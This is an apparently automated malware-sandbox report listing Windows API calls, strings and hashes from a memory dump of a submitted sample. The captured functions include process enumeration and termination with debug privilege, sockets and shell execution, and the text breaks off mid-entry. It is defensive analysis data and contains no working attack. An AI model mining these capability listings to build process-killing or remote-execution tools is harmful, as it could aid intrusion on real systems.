                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: NULL Pointer assignment$Not an Object type
                                                          • API String ID: 0-572801152
                                                          • Opcode ID: 5711f84041addd426d99d78487129a7218865f97f3c62ad755412919faeeba83
                                                          • Instruction ID: dfd79d92d74db45176b58c5c91652170e7894d0a84df2528c021655ab28b379b
                                                          • Opcode Fuzzy Hash: 5711f84041addd426d99d78487129a7218865f97f3c62ad755412919faeeba83
                                                          • Instruction Fuzzy Hash: EAC19071A0021A9BDF10DF98D884AAFB7F5BF48314F14853AE905BB2C2E774AD45CB94
                                                          APIs
                                                            • Part of subcall function 003E710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?,?,003E7455), ref: 003E7127
                                                            • Part of subcall function 003E710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7142
                                                            • Part of subcall function 003E710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7150
                                                            • Part of subcall function 003E710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?), ref: 003E7160
                                                          • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00409806
                                                          • _memset.LIBCMT ref: 00409813
                                                          • _memset.LIBCMT ref: 00409956
                                                          • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00409982
                                                          • CoTaskMemFree.OLE32(?), ref: 0040998D
                                                          Strings
                                                          • NULL Pointer assignment, xrefs: 004099DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                          • String ID: NULL Pointer assignment
                                                          • API String ID: 1300414916-2785691316
                                                          • Opcode ID: 7ab09c21702845fcf6df56a3f7e1e34dfe21c5363cb0aa6e2af367e8b6e114e4
                                                          • Instruction ID: f0b1e523d1c028f872956e7a9ffa8a2df5eef6f10812b6ec887dca1601c2cee5
                                                          • Opcode Fuzzy Hash: 7ab09c21702845fcf6df56a3f7e1e34dfe21c5363cb0aa6e2af367e8b6e114e4
                                                          • Instruction Fuzzy Hash: B0914871D00229EBDF11DFA5DC41EDEBBB9AF48310F20416AF519AB281DB719A44CFA0
                                                          APIs
                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00416E24
                                                          • SendMessageW.USER32(?,00001036,00000000,?), ref: 00416E38
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00416E52
                                                          • _wcscat.LIBCMT ref: 00416EAD
                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 00416EC4
                                                          • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00416EF2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window_wcscat
                                                          • String ID: SysListView32
                                                          • API String ID: 307300125-78025650
                                                          • Opcode ID: 0704cf82525cec9e3f0f7427a1be4fede4d1521c27d38054a53d599825257938
                                                          • Instruction ID: 5f55bf8cea2ec7c4f8aa30ad9d67b93ae36087b2ac931d5b5e9cd7c00f692ebd
                                                          • Opcode Fuzzy Hash: 0704cf82525cec9e3f0f7427a1be4fede4d1521c27d38054a53d599825257938
                                                          • Instruction Fuzzy Hash: 1D41AF70A40308ABEB21DF64CC85BEB77A8EF08354F11452AF984E7291D775DD898B68
                                                          APIs
                                                            • Part of subcall function 003F3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 003F3C7A
                                                            • Part of subcall function 003F3C55: Process32FirstW.KERNEL32(00000000,?), ref: 003F3C88
                                                            • Part of subcall function 003F3C55: CloseHandle.KERNEL32(00000000), ref: 003F3D52
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040E9A4
                                                          • GetLastError.KERNEL32 ref: 0040E9B7
                                                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0040E9E6
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0040EA63
                                                          • GetLastError.KERNEL32(00000000), ref: 0040EA6E
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040EAA3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2533919879-2896544425
                                                          • Opcode ID: 54306967039a4b30eb7412ace02a0d182a49ee666f72e8564c553e095c02dae0
                                                          • Instruction ID: 168daa6db9e7b15349b119704065f64704ddc32fc130c19a5819789fb1ece744
                                                          • Opcode Fuzzy Hash: 54306967039a4b30eb7412ace02a0d182a49ee666f72e8564c553e095c02dae0
                                                          • Instruction Fuzzy Hash: DA41AC713002009FDB16EF19CC96F6EB7A5AF45310F14842EF9065F2D2DB74A815CB99
                                                          APIs
                                                          • LoadIconW.USER32(00000000,00007F03), ref: 003F3033
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: IconLoad
                                                          • String ID: blank$info$question$stop$warning
                                                          • API String ID: 2457776203-404129466
                                                          • Opcode ID: 377df45b9751ff9a70a07ac253b4d24068e78220dad823048c12c5f4f6f2c168
                                                          • Instruction ID: d98e3358df066306c16cba39bf10a0d8f41458d7f9f2bf8e65250a4d1e654839
                                                          • Opcode Fuzzy Hash: 377df45b9751ff9a70a07ac253b4d24068e78220dad823048c12c5f4f6f2c168
                                                          • Instruction Fuzzy Hash: 5511273134838BBEF7169A55DC42DBF779C9F15364B20002BFB01AA581DF749F4056A9
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 003F4312
                                                          • LoadStringW.USER32(00000000), ref: 003F4319
                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 003F432F
                                                          • LoadStringW.USER32(00000000), ref: 003F4336
                                                          • _wprintf.LIBCMT ref: 003F435C
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003F437A
                                                          Strings
                                                          • %s (%d) : ==> %s: %s %s, xrefs: 003F4357
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString$Message_wprintf
                                                          • String ID: %s (%d) : ==> %s: %s %s
                                                          • API String ID: 3648134473-3128320259
                                                          • Opcode ID: ec44a09830a392e42fb136e5e9fb2cbb628adda78e47477ebe4f79e58c899794
                                                          • Instruction ID: 9ca2c93ab18ecd4b4680cc9e134047cbe9d4f78a4eb9464a758fb27ba2843d7c
                                                          • Opcode Fuzzy Hash: ec44a09830a392e42fb136e5e9fb2cbb628adda78e47477ebe4f79e58c899794
                                                          • Instruction Fuzzy Hash: 050144F6900208BFE751E790DD89EF7776CD708300F4045B6BB45E6051EA745E8A4B78
                                                          APIs
                                                            • Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623
                                                          • GetSystemMetrics.USER32(0000000F), ref: 0041D47C
                                                          • GetSystemMetrics.USER32(0000000F), ref: 0041D49C
                                                          • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0041D6D7
                                                          • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0041D6F5
                                                          • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0041D716
                                                          • ShowWindow.USER32(00000003,00000000), ref: 0041D735
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0041D75A
                                                          • DefDlgProcW.USER32(?,00000005,?,?), ref: 0041D77D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                          • String ID:
                                                          • API String ID: 1211466189-0
                                                          • Opcode ID: c9435b84f2a3b4f89018690fdf7d3766dea61aa494efa0426950e1c7e8ba1fb0
                                                          • Instruction ID: c042ccd36a2cb4ab83eb06c3a757e1383defac4cefcecb2741af1f5c8d09106e
                                                          • Opcode Fuzzy Hash: c9435b84f2a3b4f89018690fdf7d3766dea61aa494efa0426950e1c7e8ba1fb0
                                                          • Instruction Fuzzy Hash: 99B17AB1A00215EBDF14CF68C9857FE7BB1BF04711F08817AEC589B295D738A994CB98
                                                          APIs
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000), ref: 00392ACF
                                                          • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00392B17
                                                          • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000), ref: 003CC21A
                                                          • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,003CC1C7,00000004,00000000,00000000,00000000), ref: 003CC286
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: ShowWindow
                                                          • String ID:
                                                          • API String ID: 1268545403-0
                                                          • Opcode ID: 4bbeeb409dc72a47ef1be66cf0eefd3513e94f0cbaaa80aec78e3751cb426b76
                                                          • Instruction ID: f8b2772e96b1a321d6fa1d17a68f3a063ed7792084f2ee4f19fbea46a52c9ef8
                                                          • Opcode Fuzzy Hash: 4bbeeb409dc72a47ef1be66cf0eefd3513e94f0cbaaa80aec78e3751cb426b76
                                                          • Instruction Fuzzy Hash: 9641FC32618F80BACF379B29CC8CB7B7B95AB55310F15C82DE04786961CA75AC46D710
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,000001F5), ref: 003F70DD
                                                            • Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
                                                            • Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003F7114
                                                          • EnterCriticalSection.KERNEL32(?), ref: 003F7130
                                                          • _memmove.LIBCMT ref: 003F717E
                                                          • _memmove.LIBCMT ref: 003F719B
                                                          • LeaveCriticalSection.KERNEL32(?), ref: 003F71AA
                                                          • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003F71BF
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003F71DE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 256516436-0
                                                          • Opcode ID: c2dbe81589c2cf8d1224a01e01027e705af0d9217090a976152f71c4c0b4c835
                                                          • Instruction ID: 72996a1bd308ede380edfa49c9fa618caadbfd4f8dd059f39e4db1f4edafa3e6
                                                          • Opcode Fuzzy Hash: c2dbe81589c2cf8d1224a01e01027e705af0d9217090a976152f71c4c0b4c835
                                                          • Instruction Fuzzy Hash: 27317E31A00205EBCF01DFA4DC85AAFB778EF45310F1481B9EA04AB246DB30DE15CBA4
                                                          APIs
                                                          • DeleteObject.GDI32(00000000), ref: 004161EB
                                                          • GetDC.USER32(00000000), ref: 004161F3
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004161FE
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041620A
                                                          • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00416246
                                                          • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00416257
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0041902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00416291
                                                          • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004162B1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                          • String ID:
                                                          • API String ID: 3864802216-0
                                                          • Opcode ID: 71ccef50dfb26347920f97af660729aaff230f6dcf3e6f7fd2e94f2006f1c0e7
                                                          • Instruction ID: 5ad6d53688d358abc60bf087938642774e5b338c007c6292437d30418b436ea5
                                                          • Opcode Fuzzy Hash: 71ccef50dfb26347920f97af660729aaff230f6dcf3e6f7fd2e94f2006f1c0e7
                                                          • Instruction Fuzzy Hash: BB316D72101210BFEF118F50DC8AFEB3BA9EF49765F054065FE089A291C6759C46CB68
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memcmp
                                                          • String ID:
                                                          • API String ID: 2931989736-0
                                                          • Opcode ID: 99fab9310a9180576ef3daa644a9d1869a973c6e2b4a1dbc0e9ea58b05df4c7e
                                                          • Instruction ID: 5a6f677a757906d2abecab960bbbd28e075765d52d10a4eeed760c8bb61c3aca
                                                          • Opcode Fuzzy Hash: 99fab9310a9180576ef3daa644a9d1869a973c6e2b4a1dbc0e9ea58b05df4c7e
                                                          • Instruction Fuzzy Hash: A4210A6170427677E2076613AE52FFBF36C9E1038CF644511FE045AAC3EBA4DE10C1A5
                                                          APIs
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                            • Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9
                                                          • _wcstok.LIBCMT ref: 003FEC94
                                                          • _wcscpy.LIBCMT ref: 003FED23
                                                          • _memset.LIBCMT ref: 003FED56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                          • String ID: X
                                                          • API String ID: 774024439-3081909835
                                                          • Opcode ID: 461209f6d430ad0fc413825f643ef0d307dac332b95a0453e8a673582faf6308
                                                          • Instruction ID: 711796f870d67f7f19bd7288c91eb3f692545d7ee3035180c2cd4bdc6813c190
                                                          • Opcode Fuzzy Hash: 461209f6d430ad0fc413825f643ef0d307dac332b95a0453e8a673582faf6308
                                                          • Instruction Fuzzy Hash: F1C182715087449FDB26EF24C881E6AB7E4FF85310F11492DF9999B2A2DB70EC45CB82
                                                          APIs
                                                          • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00406C00
                                                          • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00406C21
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00406C34
                                                          • htons.WSOCK32(?,?,?,00000000,?), ref: 00406CEA
                                                          • inet_ntoa.WSOCK32(?), ref: 00406CA7
                                                            • Part of subcall function 003EA7E9: _strlen.LIBCMT ref: 003EA7F3
                                                            • Part of subcall function 003EA7E9: _memmove.LIBCMT ref: 003EA815
                                                          • _strlen.LIBCMT ref: 00406D44
                                                          • _memmove.LIBCMT ref: 00406DAD
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                          • String ID:
                                                          • API String ID: 3619996494-0
                                                          • Opcode ID: a965b89438f89764aa45f0d1a19a72420733c71bf5405fe7125c5fdb9fd25ea5
                                                          • Instruction ID: b9a4e1d0dec028ea57ae446f094a441c4c4e6c68ee37dc49cbc9ae98c507578d
                                                          • Opcode Fuzzy Hash: a965b89438f89764aa45f0d1a19a72420733c71bf5405fe7125c5fdb9fd25ea5
                                                          • Instruction Fuzzy Hash: CF81B371204200ABDB11EB24CC82F6BB7E8AF85714F10492EF956AF2D2DB74ED05C796
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3a772b37583ad88e1f65d1691b3b161d0624546236c1e774e3f4cf4edd3bd559
                                                          • Instruction ID: c12e4c3227fd5e4009a8ee323cf73f36cada6b09d0342d93aaa89aa765c31447
                                                          • Opcode Fuzzy Hash: 3a772b37583ad88e1f65d1691b3b161d0624546236c1e774e3f4cf4edd3bd559
                                                          • Instruction Fuzzy Hash: C0717D3090010AEFDF06DF99CC89EBEBB79FF89310F218159F915AA251C730AA51CB64
                                                          APIs
                                                          • IsWindow.USER32(012E61C0), ref: 0041B3EB
                                                          • IsWindowEnabled.USER32(012E61C0), ref: 0041B3F7
                                                          • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0041B4DB
                                                          • SendMessageW.USER32(012E61C0,000000B0,?,?), ref: 0041B512
                                                          • IsDlgButtonChecked.USER32(?,?), ref: 0041B54F
                                                          • GetWindowLongW.USER32(012E61C0,000000EC), ref: 0041B571
                                                          • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0041B589
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                                                          • Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                          • String ID:
                                                          • API String ID: 4072528602-0
                                                          • Opcode ID: 808f9d511cb62a2764543541c8c9645d8baf401bb66d9811943862e68c155e0a
                                                          • Instruction ID: 199454eb7395cd62f89273eadf2e3e86d741682ea029bb05e30bea1e6a20c994
                                                          • Opcode Fuzzy Hash: 808f9d511cb62a2764543541c8c9645d8baf401bb66d9811943862e68c155e0a
                                                          • Instruction Fuzzy Hash: 2B719E38600604EFDB21DF55C894FFB7BB9EF09310F14806AE955973A2C739A891CB98
                                                          APIs
                                                          • _memset.LIBCMT ref: 0040F448
                                                          • _memset.LIBCMT ref: 0040F511
                                                          • ShellExecuteExW.SHELL32(?), ref: 0040F556
                                                            • Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
                                                            • Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC
                                                            • Part of subcall function 003AFC86: _wcscpy.LIBCMT ref: 003AFCA9
                                                          • GetProcessId.KERNEL32(00000000), ref: 0040F5CD
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040F5FC
                                                          Strings
